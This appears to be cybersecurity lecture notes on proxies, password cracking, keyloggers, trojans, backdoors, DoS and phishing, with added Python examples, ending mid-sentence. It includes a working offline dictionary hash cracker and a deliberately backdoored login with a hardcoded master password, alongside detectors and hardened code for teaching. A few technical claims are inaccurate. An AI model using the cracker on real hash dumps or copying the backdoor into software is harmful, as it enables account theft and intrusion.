
Proxy server and anonymizer


A proxy server is an intermediary server that sits between a client and the internet: the client talks to the proxy, and the proxy talks to the destination on the client's behalf.

Proxy servers offer the following basic functionality:

• Firewall and network data filtering.

• Network connection sharing
• Data caching

Proxy servers can also conceal a client's network identity: the destination server sees the proxy's IP address rather than the client's.

Purpose of Proxy Servers

Reasons to use a proxy server:

• Monitoring and Filtering

• Improving performance
• Translation
• Accessing services anonymously
• Security

Monitoring and Filtering

Proxy servers support several kinds of filtering and monitoring, such as:

• Content filtering
• Filtering of encrypted traffic (only possible where the proxy terminates the TLS connection itself)
• Bypassing filters (a proxy elsewhere can be used to reach sites blocked on the local network)
• Logging and eavesdropping

Improving performance

A caching proxy speeds up service by serving content from its cache, which was populated when an earlier client request fetched the same resource.


Translation

A translation proxy customises the source site for local users by excluding source content or substituting it with localised content. Traffic from global users is routed to the source website through the translation proxy, which rewrites the pages on the way.

Accessing services anonymously

The destination server receives the request from the anonymizing proxy server and therefore gets no information (IP address, identifying headers) about the end user.

Security

Because the proxy hides the user's identity and address, it offers some protection against spam and against attackers reaching the client directly. Note that the proxy operator itself sees every request, so the user is only as anonymous as the proxy is trustworthy.

Types of proxies

Forward proxies
The client sends its request to a proxy on its own (internal) network, which forwards it to the internet on the client's behalf.

Open proxies
A forward proxy that anyone on the internet can use. Clients use open proxies to conceal their IP address while browsing the web.

Reverse proxies
The proxy sits in front of one or more origin servers. Requests from the internet arrive at the reverse proxy, which forwards them to the origin servers, and the response is returned to the client as if it came directly from the proxy itself.
Architecture of a proxy server

The proxy server architecture is divided into the following modules:

Proxy user interface

This module controls and manages the user interface, providing an easy-to-use graphical interface (a window and a menu) to the end user. The menu offers the following functions:
• Start proxy
• Stop proxy
• Exit
• Blocking URL
• Blocking client
• Manage log
• Manage cache
• Modify configuration

Proxy server listener

This module listens on the proxy's port for new requests from client browsers. It also rejects connections from clients on the block list supplied by the user.

Connection Manager
It contains the main functionality of the proxy server. It performs the following functions:

• Read the request header sent by the client.
• Parse the URL and determine whether it is blocked.
• Open a connection to the web server.
• Read the reply from the web server.
• If no copy of the page exists in the cache, download it from the web server; otherwise compare the Last-Modified date in the reply header with the cached copy and serve the page from the cache or from the web server accordingly (in practice this is a conditional request carrying an If-Modified-Since header).
• Check whether caching is allowed for the reply (Cache-Control directives such as no-store forbid it) and, if so, store the page in the cache.

Cache Manager
This module is responsible for storing, deleting, clearing and searching of web pages in the cache.

Log Manager
This module is responsible for viewing, clearing and updating the logs.

Configuration Manager
This module creates and stores the configuration settings that the other modules use for their work, such as caching.
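The connection-manager and anonymity decisions above, written out as an added example in Python (this is not code from the page or from any particular proxy product). The block lists, the cache dictionary and the sample HTTP request are constructed for the example; a real proxy would take them from the configuration manager and from the listener socket. It also shows the one decision the "accessing services anonymously" purpose turns on: whether the proxy forwards the client's address upstream in X-Forwarded-For/Via headers, as a transparent proxy does, or strips every header that names the client.

```python
import re
from urllib.parse import urlsplit

# Constructed block lists for the example (a real proxy reads them from its configuration).
BLOCKED_HOSTS = {"ads.example.net", "blocked.example.org"}
BLOCKED_CLIENTS = {"10.0.0.99"}
# Headers that reveal the original client; an anonymizing proxy must not pass them upstream.
CLIENT_IDENTIFYING = ("x-forwarded-for", "forwarded", "via", "x-real-ip")


def parse_request(raw: bytes):
    """Split an HTTP/1.1 proxy request into (method, target URL, headers)."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def outbound_headers(headers, client_ip, anonymize):
    """Headers forwarded to the web server.  The client-supplied value of any
    identifying header is discarded either way (a forged X-Forwarded-For cannot be
    injected); a transparent proxy then adds the real client address, an
    anonymizing proxy adds nothing."""
    out = {k: v for k, v in headers.items() if k not in CLIENT_IDENTIFYING}
    if not anonymize:
        out["x-forwarded-for"] = client_ip
        out["via"] = "1.1 example-proxy"
    return out


def is_cacheable(status, resp_headers):
    """Connection-manager step: is caching allowed for this reply?"""
    cc = resp_headers.get("cache-control", "").lower()
    return status == 200 and "no-store" not in cc and "private" not in cc


def store(cache, target, status, resp_headers, body, now):
    """Cache the reply (if allowed) with its Last-Modified date and freshness lifetime."""
    if not is_cacheable(status, resp_headers):
        return False
    m = re.search(r"max-age=(\d+)", resp_headers.get("cache-control", ""))
    ttl = int(m.group(1)) if m else 0          # no max-age: treat as immediately stale
    cache[target] = {"body": body,
                     "last_modified": resp_headers.get("last-modified"),
                     "expires": now + ttl}
    return True


def handle(client_ip, raw, cache, now, anonymize=True):
    """Decide what the connection manager does with one request.
    Returns (action, detail); action is reject / cache / revalidate / forward."""
    if client_ip in BLOCKED_CLIENTS:                 # listener: client block list
        return "reject", "client blocked"
    method, target, headers = parse_request(raw)
    host = urlsplit(target).hostname or headers.get("host", "")
    if host.lower() in BLOCKED_HOSTS:                # parse URL, check URL block list
        return "reject", "url blocked"
    entry = cache.get(target)
    if entry is not None and method == "GET":
        if now < entry["expires"]:                   # fresh copy: no upstream connection
            return "cache", entry["body"]
        # stale copy: ask the server whether it changed since the cached Last-Modified date
        cond = outbound_headers(headers, client_ip, anonymize)
        if entry["last_modified"]:
            cond["if-modified-since"] = entry["last_modified"]
        return "revalidate", cond
    return "forward", outbound_headers(headers, client_ip, anonymize)
```

`handle` returns a decision rather than performing the network call, so the cache, block-list and Last-Modified logic can be exercised without a server; wiring it to sockets is the listener's job and is left out here.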

Proxies and attackers

From an attacker's point of view the sequence is simple: the attacker first connects to a proxy server, and the proxy server then lets the attacker hide their identity from the target, which only ever sees the proxy.

Anonymizers

• An anonymizer or anonymous proxy is a tool that attempts to make activity on the internet untraceable.
• It is a proxy server that acts as an intermediary and privacy shield between a client computer and the rest of the internet.
• It accesses the internet on the user's behalf, protecting personal information by hiding the client computer's identifying information.

How it works

• A commercial anonymizer service such as Anonymizer's personal VPN routes all of the user's traffic through an encrypted tunnel from the laptop to hardened servers and network.
• The VPN server then masks the user's real IP address so that the user has continuous anonymity for online activity.

The limits are worth stating: the anonymizer operator sees all of the traffic, and an adversary who can compel or compromise the operator, or correlate traffic entering and leaving it, can still identify the user.

Advantages of an anonymizer
While using an anonymizer, your IP address, physical location and browsing are hidden from the sites you visit, protecting you from:

• Government oversight
• Hackers (IP sniffing)
• Unsecured public WiFi
• Online activity tracking

Example: Sameer uses an anonymizer to log into an email spoofing website and sends out fraudulent emails to hundreds of people. When the police try to track the IP addresses in the email headers, they trace them only as far as the anonymizer and cannot identify Sameer (unless the anonymizer operator keeps logs and hands them over).

Example: A school in Cochin had banned Facebook usage from the computer lab. The school authorities had configured the firewall so that access to the site from school computers was blocked. Sameer, a student in the 8th grade, used an anonymizer to reach Facebook from the school: the firewall only sees a connection to the anonymizer, not to Facebook.

Password cracking


Password cracking is the process of recovering passwords from data that have been stored in or
transmitted by a computer system.

A common approach (brute-force attack) is to try guesses repeatedly for the password and check
them against an available cryptographic hash of the password.

The purpose of password cracking

• Helping a user recover a forgotten password
• Gaining unauthorized access to a system
• As a preventive measure by system administrators, to check for easily crackable passwords

Manual Password Cracking

• Find a valid user name
• Create a list of possible passwords
• Rank the passwords from high probability to low
• Key in each password in turn
• If the system lets you in, stop; otherwise try the next password until one succeeds or the list is exhausted (account lockout policies usually cut this short, which is why attackers prefer offline attacks whenever they can get hold of the hashes)

Examples of guessable passwords

• Blank
• Words like "passcode"
• Series of letters such as "QWERTY"
• The user's name or login name
• Name of the user's friend, relative or pet
• The user's birthplace or date of birth
• Vehicle number, office number, etc.
• Name of a celebrity
• A simple modification of one of the preceding, e.g. suffixing a digit such as 1

Categories of password cracking attacks:

• Online attacks
• Offline attacks
• Non-electronic attacks: social engineering, shoulder surfing, dumpster diving

Online attacks

• An attacker may create a script (an automated program) to try each password against the live login.
• A common online attack is the man-in-the-middle (bucket-brigade) attack, in which the attacker relays and reads the traffic between the user and the site.
• Used to obtain passwords for e-mail accounts on public websites such as Gmail and Yahoo Mail.
• Also used to get passwords for financial websites.

Offline attacks

• Are performed from a location other than the target system where the passwords reside or are used.
• Require first obtaining a copy of the stored password hashes (for example by copying the password file or database), which typically needs physical or privileged access to the system. Once the hashes are in hand, guesses are checked locally at full speed, with no lockout or rate limit to slow the attacker down.

Types of Password Attacks

• Password guessing
Attackers can guess locally or remotely, using either a manual or an automated approach.

• Dictionary attacks
Work on the assumption that most passwords consist of whole words, dates or numbers taken from a dictionary or word list.

• Hybrid password attacks
Assume that administrators push users to make their passwords at least slightly different from a word that appears in a dictionary, so the attack takes each dictionary word and applies the usual modifications (appending digits or symbols, changing case, reversing, substituting digits for letters) before trying it.

Weak passwords

• The password contains fewer than eight characters.
• The password is a word found in a dictionary (English or foreign).
• The password is a common usage word such as the name of a family member, pet, friend or fantasy character.
• Computer terms and names: commands, sites, companies, hardware, software.
• The words "<company name>", "sanjose", "sanfran" or any derivation of them; birthdays and other personal information such as addresses and phone numbers.
• Word or number patterns like aaabbb, QWERTY, 123321, etc.
• Any of the above spelled backwards.

Strong Passwords

• Contain both upper- and lower-case characters (a-z, A-Z).
• Have digits and punctuation characters as well as letters (e.g. 0-9 and characters such as !, @, #, %).
• Are at least eight alphanumeric characters long.
• Are not a word in any language, slang, dialect, jargon, etc.
• Are not based on personal information, names of family, etc.
• Passwords should never be written down or stored online in the clear (a password manager is the accepted exception).
• Try to create passwords that can be easily remembered.
• One way to do this is to create a password based on a song title, affirmation or other phrase. For example, the phrase might be "This May Be One Way To Remember" and the password could be "TmbIW!>r~" or some other variation.
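The hybrid attack described above and the weak-password rules, as an added Python example (not from the page). The word list, the "personal" facts and the leaked hash dump are all constructed here; real dumps are unsalted far too often, which is what lets one hash computation test a guess against every user at once. The same mutation rules drive both the attack and a policy check, which is the point: a rule like "not a dictionary word" is only useful if the checker also tries what the attacker tries.

```python
import hashlib

# Constructed inputs: a tiny word list, facts an attacker could look up about the
# user, and the mutation rules a hybrid attack applies to every word.
WORDLIST = ["password", "welcome", "dragon", "summer", "qwerty"]
PERSONAL = ["sameer", "cochin", "1998"]
LEET = str.maketrans("aeios", "43105")
SUFFIXES = ["", "1", "12", "123", "!", "1!", "2024", "#1"]


def sha256_hex(s):
    """Unsalted SHA-256, as found in many leaked dumps (constructed here, not a real leak)."""
    return hashlib.sha256(s.encode()).hexdigest()


def hybrid_candidates(word):
    """Expand one dictionary word with the mutations a hybrid attack tries:
    case changes, reversal, leet substitution and the usual digit/symbol suffixes."""
    bases = {word.lower(), word.capitalize(), word.upper(), word[::-1]}
    bases |= {b.translate(LEET) for b in list(bases)}
    return {b + s for b in bases for s in SUFFIXES}


def crack_hashes(hashes, wordlist):
    """Offline attack: hash every candidate and look it up in the stolen hash set.
    Because the hashes are unsalted, one computation tests a guess against all users."""
    targets = set(hashes)
    found = {}
    for word in wordlist:
        for cand in hybrid_candidates(word):
            h = sha256_hex(cand)
            if h in targets:
                found[h] = cand
    return found


def weak_password_reason(pw, wordlist=WORDLIST, personal=PERSONAL):
    """Return why a password is weak under the rules above, or None if it passes."""
    low = pw.lower()
    if len(pw) < 8:
        return "shorter than eight characters"
    for fact in personal:
        if fact.lower() in low:
            return "contains personal information"
    for word in wordlist:
        # the checker tries exactly the variations the hybrid attack would try
        if pw in hybrid_candidates(word) or low == word or low == word[::-1]:
            return "dictionary word, reversed word, or a simple variation of one"
    # crude pattern checks: aaabbb, abcdef, 123456
    if len(set(pw)) <= 2 or low in "abcdefghijklmnopqrstuvwxyz" or low in "0123456789":
        return "letter or number pattern"
    classes = [any(c.islower() for c in pw), any(c.isupper() for c in pw),
               any(c.isdigit() for c in pw), any(not c.isalnum() for c in pw)]
    if sum(classes) < 3:
        return "too few character classes (mix upper, lower, digits, punctuation)"
    return None
```

The attack side never touches the login service, so nothing in the "strong password" list except length and unpredictability slows it down; salted, slow hashes on the server side are what make it expensive.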

Keyloggers and spyware

Keyloggers

• A keylogger is a technology that tracks and records consecutive keystrokes on a keyboard.
• Because sensitive information such as usernames and passwords is often entered on a keyboard, a keylogger can be a very dangerous technology.
• Keyloggers are often a component of malware or spyware, delivered by a virus or trojan.
• A keylogger, sometimes called a keystroke logger or system monitor, is a type of surveillance technology used to monitor and record each keystroke typed on a specific computer's keyboard.
• Keylogger software is also available for use on smartphones, such as Apple's iPhone and
Android devices.
• Keyloggers are often used as a spyware tool by cybercriminals to steal personally identifiable
information (PII), login credentials and sensitive enterprise data.

• Keylogger recorders may also be used by employers to observe employees' computer

activities, parents to supervise their children's internet usage, users to track possible
unauthorized activity on their devices or law enforcement agencies to analyse incidents
involving computer use.

• These uses are considered ethical or appropriate in varying degrees.

Software-based keyloggers:

• Software-based keyloggers hook into the target computer's operating system in various ways:
• running beneath the operating system as a malicious hypervisor (virtual-machine based), or acting as the keyboard driver (kernel-based);
• using the operating system's application programming interface to watch keystrokes (API-based, e.g. keyboard hooks);
• recording information submitted on web-based forms (form grabbers), or capturing network traffic associated with HTTP POST events to steal passwords (packet analysers).
• A Windows keylogger usually consists of two files, a DLL and an EXE: the EXE installs the hook and the DLL holds the hook procedure that gets loaded into other processes.

Hardware keyloggers:

• A hardware circuit installed between the keyboard and the computer that logs keystroke activity (keyboard hardware). It needs no software on the host, so software-based detection cannot see it.
• Typical target: ATMs, where a keypad overlay or inline logger captures PINs.

Acoustic keylogging

• Acoustic keylogging monitors the sound created by each individual keystroke and uses the
subtly different acoustic signature that each key emits to analyse and determine what the
target computer's user is typing.

Anti-keylogger

• An anti-keylogger (or anti—keystroke logger) is a type of software specifically designed for the
detection of keystroke logger software; often, such software will also incorporate the ability to
delete or at least immobilize hidden keystroke logger software on your computer.

Benefits of an anti-keylogger

• Keylogger removal: it removes keyloggers that are running or being launched on your computer or mobile device.
• Security: it reduces the chance that confidential information is stolen from the machine and that the user becomes a victim of cyber crime and theft. Financial institutions are frequent targets of keyloggers. Anti-keyloggers perform regular scans of the computer.
• Keylogger detection: apart from disabling keyloggers, the anti-keylogger warns whenever key-logging activity is launched on the machine.
• User friendly and reliable: the anti-keylogger is easy to use and highly reliable.

Spyware

• Spyware is software that is installed on a computing device without the end user's knowledge.

• Such software is controversial because even though it is sometimes installed for relatively
innocuous (not meant to cause harm) reasons, it can violate the end user's privacy and has
the potential to be abused.

Spyware that is installed for innocuous reasons is sometimes referred to as tracking software.
• In the workplace, such software may be installed on corporate laptops to monitor employees' browsing activities.
• In the home, parents might install a keystroke logger to monitor their children's activity on the internet.
• An advertiser might use cookies to track which web pages a user visits in order to target advertising in a contextual marketing campaign.

If the end user is told that data is being collected and has the ability to learn with whom the data is
being shared, such data collection programs are not considered spyware.

• When tracking software is abused, there can be a significant impact on privacy.

• For example, if a smartphone gets infected with mobile spyware that was sideloaded with a
third party app, the phone's camera and microphone can be used to spy on nearby activity,
record phone calls, log browsing activity and keystrokes, and monitor the phone owner's

Spyware can be difficult to detect :

• The first indication a user has that a computing device has been infected with spyware is a
noticeable reduction in processor or network connection speeds and in the case of mobile
devices -- data usage and battery life.

• Antivirus software that includes antispyware protection should be used to find and remove spyware.
• To prevent spyware, users should only download software from trusted sources, read all disclosures when installing software, avoid clicking on pop-up ads and stay current with updates and patches for browser, operating system and application software.
Trojan horses and backdoors

Trojan horses

• A Trojan horse, or Trojan, in computing is any malicious computer program which misrepresents itself as useful, routine, a game, an application or otherwise interesting in order to persuade a victim to install it.
• The term is derived from the Ancient Greek story of the wooden horse that was used to help Greek troops sneak into the city of Troy.
• Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.

Purpose and use of trojans

Destructive uses

• Crashing the computer or device; modification or deletion of files; data corruption.
• Formatting disks, destroying all contents.

Use of resources or identity

• Use of the machine as part of a botnet (e.g. to perform automated spamming or to distribute
Denial-of-service attacks).
• Using computer resources for mining cryptocurrencies
• Using the infected computer as proxy for illegal activities and/or attacks on other computers.
• Infecting other connected devices on the network.

Money theft, ransom

• Electronic money theft.

• Installing ransomware such as Crypto Locker.


How computers are affected

• A site offers a free download of a program or game that normally costs money. Downloading the pirated version lets you use or play it illegally, but during the install it also installs a trojan horse on the computer.
• You receive an e-mail that appears to be from a friend asking you to view a fantastic new program or look at a file. Opening the file infects your computer with a trojan horse.
• A popular screen saver website has been compromised or has had infected screen savers uploaded to it. Downloading the screen saver to your computer also installs a trojan horse on the computer.

Examples of trojans: Beast, Zeus, Sub7.


Backdoors

• A backdoor is a technique in which a system's security mechanism is bypassed undetectably to access a computer or its data.
• The backdoor access method is sometimes written into a program by the programmer who develops it.
• A backdoor is also known as a trapdoor.
• A developer may create a backdoor so that an application or operating system can be accessed for troubleshooting or other purposes.
• However, attackers often use backdoors that they discover or install themselves as part of an exploit.
• In some cases, a worm or virus is designed to take advantage of a backdoor created by an earlier attack.

How backdoors work

• Backdoors can vary widely. Some, for example, are put in place by legitimate vendors, while others are introduced inadvertently as a result of programming errors.
• Developers sometimes use backdoors during the development process which are then not removed from production code.
• Backdoors are also commonly put in place through malware.
• A malware module may act as a backdoor itself, or it can act as a first-line backdoor, meaning that it serves as a staging platform for downloading other malware modules that perform the actual attack.
• Encryption algorithms and networking protocols may also, at least potentially, contain backdoors.
• For example, in 2016 researchers showed how a 1024-bit prime used as a Diffie-Hellman modulus could be crafted so that whoever chose it can compute discrete logarithms modulo it far more cheaply than for a random prime, and thereby break key exchanges that everyone else believed secure. Such a trapdoored prime is indistinguishable from a random one, which is why standardised parameters with no published provenance are suspect.
• Dual_EC_DRBG (Dual Elliptic Curve Deterministic Random Bit Generator), a random number generator standardised by NIST, was shown as early as 2007 to have a flaw: whoever chose its elliptic-curve constants could predict its future output from a small amount of observed output. NIST withdrew the standard in 2014.
• The security community's consensus was that the NSA allowed the standard to be used, even though it knew of the weakness, so that it could use it as a backdoor.
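The "development backdoor left in production code" case above, as an added Python example (not from the page). The user store and the hardcoded debug password are constructed. The vulnerable login keeps a master password that opens any account, even one that does not exist; the hardened version drops it, compares hashes in constant time and does the same amount of work for unknown users. The small scanner at the end is the kind of static check that catches the pattern in source review; its regex and the variable names it looks for are an assumption of this example.

```python
import hashlib
import hmac
import re


def _hash(password, salt):
    """Salted PBKDF2-SHA256 (salts are fixed strings here only to keep the example reproducible)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed user store: user -> (salt, hash).
USERS = {"alice": (b"salt-alice", _hash("correct horse battery", b"salt-alice"))}
# Hash for a non-existent user, so lookups of unknown names cost the same as real ones.
DUMMY_SALT, DUMMY_HASH = b"dummy-salt", _hash("", b"dummy-salt")


def login_with_backdoor(user, password):
    """The development-backdoor pattern: a hardcoded credential that opens any account.
    Intentionally vulnerable, kept to show what the hardened version removes."""
    if password == "debug-letmein":          # left in by a developer and never removed
        return True
    rec = USERS.get(user)
    return rec is not None and _hash(password, rec[0]) == rec[1]


def login(user, password):
    """Hardened version: no master secret, constant-time comparison, and the same
    hashing work for unknown users so timing does not reveal whether a name exists."""
    rec = USERS.get(user)
    salt, expected = rec if rec else (DUMMY_SALT, DUMMY_HASH)
    ok = hmac.compare_digest(_hash(password, salt), expected)
    return ok and rec is not None


# A password-like name compared with == to a string literal (assumed naming convention).
_SUSPECT = re.compile(r"""\b(pass(word|wd)?|pwd|secret|token)\b\s*==\s*["'][^"']+["']""", re.I)


def find_hardcoded_credentials(source):
    """Cheap static check for the pattern above. Returns 1-based line numbers of suspect lines."""
    return [i for i, line in enumerate(source.splitlines(), 1) if _SUSPECT.search(line)]
```

The scanner is deliberately narrow; it will not find a backdoor that compares against a hash of the master password or that lives in a compiled dependency, which is where antimalware and network monitoring (below) take over.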
Detection and prevention

• Backdoors can be very difficult to detect, and detection methods vary considerably depending
on the computer's operating system.

• In some cases, antimalware software may be capable of detecting backdoor software.

• In other cases, security professionals may need to use specialized tools to detect backdoors,
or use a protocol monitoring tool to inspect network packets.

There are several different strategies for avoiding backdoor attacks.

• First and foremost, organizations need to be aware of security best practices, such as avoiding untrusted software and ensuring that every device is protected by a firewall.
• Application firewalls can also help to prevent backdoor attacks, since they restrict the traffic
that can flow across open ports.
• It is also important to monitor network traffic for signatures that may indicate the presence of
a backdoor.

DoS and DDoS attacks

• A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network, making it inaccessible to its intended users.
• DoS attacks accomplish this by flooding the target with traffic, or by sending it information that triggers a crash.
• In both cases the DoS attack deprives legitimate users (employees, members, account holders) of the service or resource they expected.
• Typical victims of DoS attacks are the web servers of high-profile organizations such as banking, commerce and media companies, or government and trade organizations.
• Though DoS attacks do not typically result in the theft or loss of significant information or other assets, they can cost the victim a great deal of time and money to handle.

There are two general methods of DoS attack: flooding services or crashing services.

• Flood attacks occur when the system receives more traffic than the server can buffer, causing it to slow down and eventually stop.
• Popular flood attacks include:
• Buffer overflow attacks: the most common DoS attack in this classification. The idea is to send more traffic to a network address than the programmers built the system to handle. It includes the attacks listed below, in addition to others designed to exploit bugs specific to certain applications or networks.
• ICMP flood (smurf attack): leverages misconfigured network devices by sending ICMP echo requests with a spoofed source address (the victim's) to a network's broadcast address, so that every computer on that network replies to the victim. The network is thus used to amplify the traffic. (The ping of death is a different attack: a single oversized or malformed ICMP packet that crashes a vulnerable host, i.e. a crash attack rather than a flood.)
• SYN flood: sends connection requests (SYN packets) to a server but never completes the three-way handshake. Each half-open connection occupies an entry in the server's connection backlog until it times out; once the backlog is full, legitimate clients can no longer connect.

Other DoS attacks simply exploit vulnerabilities that cause the target system or service to crash. In these attacks, input is sent that takes advantage of bugs in the target and subsequently crashes or severely destabilizes the system, so that it cannot be accessed or used.

An additional type of DoS attack is the Distributed Denial of Service (DDoS) attack. A DDoS attack occurs when multiple systems orchestrate a synchronized DoS attack against a single target. The essential difference is that instead of being attacked from one location, the target is attacked from many locations at once. The distribution of hosts that defines a DDoS gives the attacker several advantages:

• They can leverage the greater volume of machines to execute a seriously disruptive attack.
• The origin of the attack is difficult to pin down because of the random distribution of attacking systems (often worldwide).
• It is more difficult to shut down many machines than one.
• The true attacking party is very difficult to identify, as they are hidden behind many (mostly compromised) systems.

Modern security technologies have developed mechanisms to defend against most forms of DoS
attacks, but due to the unique characteristics of DDoS, it is still regarded as an elevated threat and is
of higher concern to organizations that fear being targeted by such an attack.
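A detector for the SYN-flood and DDoS cases described above, as an added Python example run over constructed packet records (not from the page and not a real capture). It counts only bare SYNs, the half-open attempts that fill the backlog, over a sliding window, and keeps two thresholds because the two attacks look different: a single-source flood trips the per-source limit, while a distributed flood keeps every source under it and only shows up in the aggregate count. The thresholds, the flag notation and the sample traffic are assumptions chosen for the example.

```python
from collections import Counter, deque


def syn_flood_alerts(packets, window=1.0, per_source_limit=100, total_limit=500):
    """Sliding-window SYN-rate detector over (timestamp, source_ip, flags) records,
    flags written as letters: 'S' = SYN, 'SA' = SYN-ACK, 'A' = ACK (constructed notation).
    Only bare SYNs are counted: those are the half-open attempts a SYN flood fills the
    backlog with.  Returns a list of (kind, who, count) alerts, one per condition."""
    recent = deque()            # bare SYNs inside the window, oldest first
    per_source = Counter()
    alerts, flagged, aggregate_alerted = [], set(), False
    for ts, src, flags in packets:
        if flags != "S":
            continue
        recent.append((ts, src))
        per_source[src] += 1
        while recent and recent[0][0] < ts - window:       # expire old entries
            _old_ts, old_src = recent.popleft()
            per_source[old_src] -= 1
        # single-source DoS: one address above the per-source limit
        if per_source[src] > per_source_limit and src not in flagged:
            flagged.add(src)
            alerts.append(("single-source SYN flood", src, per_source[src]))
        # DDoS: every address may be under the limit, but the sum is not
        if len(recent) > total_limit and not aggregate_alerted:
            aggregate_alerted = True
            sources = len({s for _, s in recent})
            alerts.append(("distributed SYN flood", "%d sources" % sources, len(recent)))
    return alerts


def sample_traffic(kind):
    """Constructed packet records for the example (not a real capture)."""
    packets = []
    if kind == "normal":                       # 50 clients completing a handshake each
        for i in range(50):
            src = "192.0.2.%d" % (i + 1)
            packets += [(i * 0.02, src, "S"), (i * 0.02 + 0.01, src, "A")]
    elif kind == "single":                     # one host, 300 bare SYNs in 0.3 s
        packets = [(i * 0.001, "203.0.113.9", "S") for i in range(300)]
    elif kind == "distributed":                # 200 hosts, 4 SYNs each, 800 in 0.8 s
        packets = [(i * 0.001, "198.51.100.%d" % (i % 200 + 1), "S") for i in range(800)]
    return sorted(packets)
```

The distributed case is why per-source blocking alone does not help against a DDoS: each of the 200 addresses stays far below any reasonable per-host threshold, and only the backlog-wide rate gives it away.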

Phishing

• Phishing is the practice of sending fraudulent communications that appear to come from a
reputable source. It is usually done through email.

• The goal is to steal sensitive data like credit card and login information, or to
install malware on the victim’s machine.
• Phishing is a common type of cyber attack that everyone should learn about in order to
protect themselves.

How does phishing work?

• Phishing starts with a fraudulent email or other communication designed to lure a victim.
• The message is made to look as though it comes from a trusted sender.
• If it fools the victim, he or she is coaxed into providing confidential information, often on a scam website.
• Sometimes malware is also downloaded onto the target's computer.

What are the dangers of phishing attacks?

• Sometimes attackers are satisfied with getting a victim’s credit card information or other
personal data for financial gain.
• Other times, phishing emails are sent to obtain employee login information or other details
for use in an advanced attack against a specific company.
• Cybercrime attacks such as advanced persistent threats (APTs) and ransomware often start
with phishing.

How do I protect against phishing attacks?

User education
• One way to protect your organization from phishing is user education. Education should
involve all employees.
• High-level executives are often a target. Teach them how to recognize a phishing email and
what to do when they receive one.
• Simulation exercises are also key for assessing how your employees react to a staged phishing attack.

Security technology
• No single cybersecurity technology can prevent phishing attacks. Instead, organizations must
take a layered approach to reduce the number of attacks and lessen their impact when they
do occur.
• Network security technologies that should be implemented include email and web security,
malware protection, user behaviour monitoring, and access control.
Got Phished by Mistake?

If you think you may have been phished, take the following measures:
• Change the passwords of the accounts you think have been compromised immediately (and of any other account where you reused the same password).
• Check whether any money has been withdrawn or any payment made through your account. You can contact your financial institution directly for this.
• Contact the organisation on whose behalf the email claimed to be sent. You should also report the incident to your account administrator.

Types of phishing attacks

• Deceptive phishing
• Spear phishing
• Whaling
• Pharming
• Voice phishing (vishing)
• Email/link phishing
• Chat phishing

Deceptive phishing
• Deceptive phishing is the most common type of phishing. In this case, an attacker attempts
to obtain confidential information from the victims.
• Attackers use the information to steal money or to launch other attacks.
• A fake email from a bank asking you to click a link and verify your account details is an
example of deceptive phishing.
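A link checker for the "fake email from your bank" case above, as an added Python example (not from the page). The sample message, the claimed sender domain and the heuristics are constructed here; the registrable-domain guess uses the last two labels because the example carries no public-suffix list. It flags the tricks such mails rely on: the bank's name buried as a subdomain of an attacker-owned domain, link text that shows one domain while the href goes to another, raw IP hosts and punycode hosts.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML mail body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable(host):
    """Crude registrable-domain guess (last two labels); assumption: no public-suffix list."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def link_warnings(href, text, claimed_sender_domain):
    """Heuristics for one link: raw-IP or punycode hosts, the brand buried as a
    subdomain of somebody else's domain, and link text naming a different domain
    than the one the href actually goes to."""
    warnings = []
    parts = urlsplit(href)
    host = (parts.hostname or "").lower()
    if parts.scheme not in ("http", "https"):
        warnings.append("non-web scheme: " + parts.scheme)
    try:
        ipaddress.ip_address(host)
        warnings.append("raw IP address as host")
    except ValueError:
        pass
    if any(label.startswith("xn--") for label in host.split(".")):
        warnings.append("punycode (IDN) host, possible homograph")
    brand = claimed_sender_domain.lower()
    if brand in host and registrable(host) != brand:
        warnings.append("sender's domain appears inside another domain: " + host)
    m = re.search(r"(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})", text.lower())
    if m and registrable(m.group(1)) != registrable(host):
        warnings.append("link text says %s but href goes to %s" % (m.group(1), host))
    return warnings


def scan_email(html, claimed_sender_domain):
    """Return {href: [warnings]} for every suspicious link in the message."""
    parser = LinkExtractor()
    parser.feed(html)
    result = {}
    for href, text in parser.links:
        w = link_warnings(href, text, claimed_sender_domain)
        if w:
            result[href] = w
    return result


# Constructed sample message imitating the "verify your account" lure.
SAMPLE_MAIL = """
<p>Dear customer, your account is locked. Please
<a href="http://examplebank.com.verify-login.net/session">https://examplebank.com/secure</a>
within 24 hours, or <a href="http://192.0.2.10/login">click here</a>.
Manage preferences at <a href="https://examplebank.com/settings">examplebank.com/settings</a>.</p>
"""
```

The checker says nothing about the sender address itself; whether the mail really came from the claimed domain is what SPF, DKIM and DMARC are for, and a mail that passes those can still carry a link like the first one above.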

Spear phishing
• Spear phishing targets specific individuals instead of a wide group of people.
• Attackers often research their victims on social media and other sites. That way, they can
customize their communications and appear more authentic.
• Spear phishing is often the first step used to penetrate a company’s defences and carry out a
targeted attack.

Whaling
• When attackers go after a "big fish" like a CEO, it is called whaling.
• These attackers often spend considerable time profiling the target to find the opportune moment and means of stealing login credentials.
• Whaling is of particular concern because high-level executives can access a great deal of company information.

Pharming
• Similar to phishing, pharming sends users to a fraudulent website that appears to be legitimate. However, in this case victims do not even have to click a malicious link to be taken to the bogus site.
• Attackers can compromise either the user's computer (for example its hosts file or DNS settings) or the DNS server it uses, and redirect the user to a fake site even when the correct URL is typed in.
Types of Wireless Network Attacks
Our modern networks are increasingly moving towards wireless technologies. As convenient as
they are, wireless connections have one major drawback – security. Compared to their wired
counterparts, securing wireless technologies poses a bit of an extra challenge.

My main focus for this article will be security over WiFi access, but I’ll address 3G/4G and Bluetooth
